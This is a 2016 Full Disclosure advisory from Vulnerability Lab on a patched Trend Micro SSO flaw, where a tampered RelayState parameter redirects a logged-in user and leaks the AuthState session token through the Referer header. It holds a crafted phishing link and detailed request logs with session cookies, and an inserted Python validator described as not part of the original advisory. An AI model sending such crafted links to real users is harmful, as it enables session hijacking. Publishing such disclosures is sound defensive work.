Message-ID: <56FD126D.1000907@vulnerability-lab.com>
Date: Thu, 31 Mar 2016 14:05:01 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability
Document Title:
===============
Trend Micro (SSO) - (Backend) SSO Redirect & Session Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1694
Trend Micro ID: 1-1-1035080936
Release Date:
=============
2016-03-31
Vulnerability Laboratory ID (VL-ID):
====================================
1694
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
Trend Micro Inc. is a global security software company founded in Los
Angeles, California with global headquarters in Tokyo, Japan, and regional
headquarters in Asia, Europe and the Americas. The company develops
security software for servers, cloud computing environments, and small
businesses. Its cloud and virtualization security products provide cloud
security for customers of VMware, Amazon AWS, Microsoft Azure and vCloud
Air. Eva Chen serves as Trend Micro's chief executive officer, a position
she has held since 2005 when she succeeded founding CEO Steve Chang. Chang
serves as chairman of Trend Micro.
(Copy of the Homepage: https://en.wikipedia.org/wiki/Trend_Micro )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a redirect
and session web vulnerability in the official Trend Micro SSO online
service web-application.
Vulnerability Disclosure Timeline:
==================================
2016-01-28: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-01-29: Vendor Notification (Trend Micro Security Team)
2016-02-02: Vendor Response/Feedback (Trend Micro Security Team)
2016-03-16: Vendor Fix/Patch (Trend Micro Developer Team)
2016-03-20: Security Bulletin (Trend Micro Security Team) [Acknowledgements]
2016-03-31: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Trend Micro
Product: Account System - (Web-Application) 2016 Q1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A redirect issue with information leakage has been discovered in the
official Trend Micro online-service web-application.
The vulnerability allows an attacker to send a crafted link to the
victim. Following the link (which requires a login) discloses the leaked
information to the attacker's webserver.
In this case the AuthState value is being leaked.
The vulnerability is located in SSOService.php. A remote attacker is
able to craft a link by modifying the RelayState parameter so that it
points to his webserver. After the victim clicks the link, the website
asks him to log in. After the login the victim is quietly redirected to
that webserver. The previous request included the new AuthState in the
GET request, and the AuthState carries the user's session. The AuthState
is afterwards exposed in the Referer header sent to the redirect target.
The attacker can use the AuthState value to take over the account session.
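The two controls that close this issue, a RelayState check on the IdP side and a test for AuthState travelling in a URL where the Referer would carry it, as an added Python example that is not part of this advisory or of Trend Micro's code. The allowed-host set, the fallback landing page and the sample Referer value are assumptions made for the example.

```python
from urllib.parse import urlsplit, parse_qs

# Origins the IdP may hand the browser back to after login. Constructed
# allowlist for this example; the real set is whatever SPs the vendor registers.
ALLOWED_RELAY_HOSTS = {"account.trendmicro.com", "sso1.trendmicro.com"}
DEFAULT_LANDING = "https://account.trendmicro.com/"  # assumed safe fallback


def validate_relay_state(relay_state, allowed_hosts=ALLOWED_RELAY_HOSTS,
                         fallback=DEFAULT_LANDING):
    """Return the redirect target the IdP should use for an already
    URL-decoded RelayState: the value itself if it is a same-origin path or
    an https URL on an allowlisted host, otherwise the fallback."""
    if not relay_state:
        return fallback
    parts = urlsplit(relay_state)
    if not parts.scheme and not parts.netloc:
        # Relative reference: allow only a plain "/path". "//host" never gets
        # here (urlsplit puts the host in netloc); "/\host" is read as a host
        # by some browsers, so it is rejected too.
        if relay_state.startswith("/") and not relay_state.startswith("/\\"):
            return relay_state
        return fallback
    if parts.scheme.lower() != "https":
        return fallback  # rejects http:, javascript:, data:, ...
    if parts.username or parts.password:
        return fallback  # https://good.example@evil.example/ style tricks
    if (parts.hostname or "").lower() not in allowed_hosts:
        return fallback  # the yahoo.com RelayState from the PoC lands here
    return relay_state


def relay_target_from_request(request_url, **kwargs):
    """Pull RelayState out of an SSOService.php request URL the way the
    framework's query parser does (one decoding pass), then validate it."""
    relay = parse_qs(urlsplit(request_url).query).get("RelayState", [""])[0]
    return validate_relay_state(relay, **kwargs)


def referer_leaks_auth_state(referer):
    """True when a Referer value carries AuthState in its query string, i.e.
    the login state is disclosed to whichever site receives the request.
    Keeping AuthState out of the URL, or sending Referrer-Policy: no-referrer
    from the login page, is what makes this False."""
    return "AuthState" in parse_qs(urlsplit(referer).query)


# The crafted link from the PoC in this advisory.
POC_URL = ("https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php"
           "?spentityid=myaccount-sp&cookieTime=1454067237"
           "&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US")
# Constructed Referer in the shape of the one in the session log; the state
# token is a placeholder, not a real value.
POC_REFERER = ("https://sso1.trendmicro.com/signin/module.php/myaccount/"
               "loginuserpass.php?AuthState=_EXAMPLESTATE%3Ahttps%3A%2F%2F"
               "sso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php")

if __name__ == "__main__":
    print(relay_target_from_request(POC_URL))     # https://account.trendmicro.com/
    print(referer_leaks_auth_state(POC_REFERER))  # True
```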
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a
privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Send the victim the link
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
2. After logging in, the victim is redirected to yahoo
3. The AuthState code is captured in the Referer on the attacker's
website (yahoo in this example)
4. Successful reproduction of the vulnerability!
--- PoC Session Logs [POST & GET] ---
GET
https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[-1] Mime Type[text/html]
Request Headers:
Host[sso1.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; my_username=; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070;
SimpleSAMLSessionID=28119447668568dc25d9f927a3de8b8d; cmTPSet=Y;
db_sampling_40=other; CMAVID=30051452809679160476046; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLAuthToken=_14b1a6b84f5a4395934a9852d7f54a891925085f91]
Connection[keep-alive]
Response Headers:
Date[Fri, 29 Jan 2016 12:20:22 GMT]
Server[Apache/2.2.15 (CentOS)]
Strict-Transport-Security[max-age=63072000; includeSubdomains;
preload]
X-Frame-Options[SAMEORIGIN]
x-content-type-options[nosniff]
Connection[close]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=UTF-8]
POST
https://account.trendmicro.com/signin/module.php/tmsaml/sp/saml2-acs.php/myaccount-sp
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[368] Mime Type[text/html]
Request Headers:
Host[account.trendmicro.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
Referer[https://sso1.trendmicro.com/signin/tmsaml/idp/SSOService.php?spentityid=myaccount-sp&cookieTime=1454067237&RelayState=https%3A%2F%2Fyahoo.com%2Fmy_account%2F&language=EN-US]
Cookie[_ga=GA1.2.1194930175.1453994345;
utag_main=v_id:015288d105ce000fa589cc8a744109052003100f00838$_sn:2$_ss:0$_st:1454070083313$dc_visit:2$_pn:3%3Bexp-session$ses_id:1454067244107%3Bexp-session$dc_event:13%3Bexp-session$dc_region:eu-west-1%3Bexp-session;
_mkto_trk=id:945-CXD-062&token:_mch-trendmicro.com-1453994348264-99684;
s_fid=3ABA5DD4863BBED1-0CC8A9DCBDDFE9BC; mmcore.tst=0.405;
mmid=1385887505%7CGAAAAAp7hzNf8gwAAA%3D%3D;
mmcore.pd=1827695683%7CHgAAAAoBQnuHM1/yDIhSt8QCANTOG7mgKNNIDwAAAPJgR8j4J9NIAAAAAP//////////AAZEaXJlY3QB8gwCAAAAAAAAAAAAACasAAAoVAAAJqwAAAEAL0kAAABcA9QT8gwA/////wHyDPIM//8GAAABAAAAAAH7swAAyxwBAAAAAAABRQ%3D%3D;
mmcore.srv=ldnvwcgus01;
__utma=44797537.1194930175.1453994345.1453996530.1454067543.2;
__utmz=44797537.1453996530.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22172226454%22%3A%22direct%22%2C%22172226455%22%3A%22false%22%2C%22172356262%22%3A%22ff%22%2C%22172471167%22%3A%22none%22%2C%222323800464%22%3A%22true%22%7D;
optimizelyEndUserId=oeu1453995412771r0.8692327924248602;
optimizelyBuckets=%7B%7D;
bounceClientVisit626={"v":{"inc":0,"cv":0,"bouncex_group":"false"},"fvt":1453996532,"vid":1454067547100635,"ao":0,"as":0,"vpv":1,"d":"d","lp":"http%3A%2F%2Fstore.trendmicro.com%2Fstore%2Ftmamer%2Fen_US%2Fpd%2FproductID.246819400%3FSN%3DBAAA-0026-8173-9688-2227%2C556FB9F6CA384728BFB98685E717C657SAAID10012P999001dc78570595684efd9aa83c487c81675a%26VendorID%3D%26SID%3D%26deliveryEmail%3Dsamir%40evolution-sec.com%26deliveryFirstname%3Dsamir%26deliveryLastname%3Dtest%26x-VID%3D%26SessionID%3Ddc78570595684efd9aa83c487c81675a%26cm_lm%3Dccae38d831da6a0c965530a742e7d6af472905eb","r":"","cvt":1454067547,"gcr":73,"m":0,"sid":0,"lvt":1454067547,"ibxt":"MTQ1Mzk5NTQzMTY0ODM4NA%3D%3D"};
__qca=P0-2089330722-1453996387067;
mbox=session#1454067243496-470264#1454070070; s_cc=true;
ga_user_id=1194930175.1453994345;
s_sq=trndmcrjptrendmicrojpprd%3D%2526pid%253Dsso1.trendmicro.com%25252Fsignin%25252Fmodule.php%25252Fmyaccount%25252Floginuserpass.php%2526pidt%253D1%2526oid%253DSign%252520In%2526oidt%253D3%2526ot%253DSUBMIT;
SimpleSAMLSessionID=01618d37b8c219c72821da79e9405c3f;
SimpleSAMLAuthToken=_a33b2c8d226a1c70d1cf6e4b00d4f6915ce83e9773]
Connection[keep-alive]
Post Data:
RelayState[https%3A%2F%2Fyahoo.com%2Fmy_account%2F]
Response Headers:
Date[Fri, 29 Jan 2016 12:20:24 GMT]
Server[Apache]
Set-Cookie[SimpleSAMLAuthToken=_d3a3368aeec333b95a3983ed8eb76342a58992e21d;
path=/; httponly]
Location[https://yahoo.com/my_account/]
Pragma[no-cache]
Cache-Control[no-cache, must-revalidate]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Frame-Options[SAMEORIGIN]
Content-Length[368]
Connection[close]
Content-Type[text/html; charset=UTF-8]
GET https://yahoo.com/my_account/ Load Flags[LOAD_DOCUMENT_URI
LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Content Size[382] Mime
Type[text/html]
Request Headers:
Host[yahoo.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
Referer[https://sso1.trendmicro.com/signin/module.php/myaccount/loginuserpass.php?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fspentityid%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%253A%252F%252Fyahoo.com%252Fmy_account%252F]
Cookie[B=]
Connection[keep-alive]
Response Headers:
Date[Fri, 29 Jan 2016 11:52:31 GMT]
Via[https/1.1 ir6.fp.ne1.yahoo.com (ApacheTrafficServer)]
Server[ATS]
Location[https://www.yahoo.com/my_account/]
Content-Type[text/html]
Content-Language[en]
Cache-Control[no-store, no-cache]
y-trace[BAEAQAAAAAAmoBYDWfT3qwAAAAAAAAAAbpfxk8XLzrgAAAAAAAAAAAAFKnerkc.NAAUqd6uR22UgXJ6WAAAAAA--]
Content-Length[382]
X-Firefox-Spdy[h2]
Security Risk:
==============
The security risk of the session and redirect web vulnerability in the
Trend Micro SSO online service web-application is estimated as high.
(CVSS 6.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [Evolution Security GmbH]
[http://www.vulnerability-lab.com/show.php?user=Hadji%20Samir]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability
for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if
Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages.
Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not
apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with
fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@...nerability-lab.com -
research@...nerability-lab.com - admin@...lution-sec.com
Section: magazine.vulnerability-db.com -
vulnerability-lab.com/contact.php -
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab -
facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or
managers. To record, list (feed), modify, use or edit our material contact
(admin@...nerability-lab.com or research@...nerability-lab.com) to get a
permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/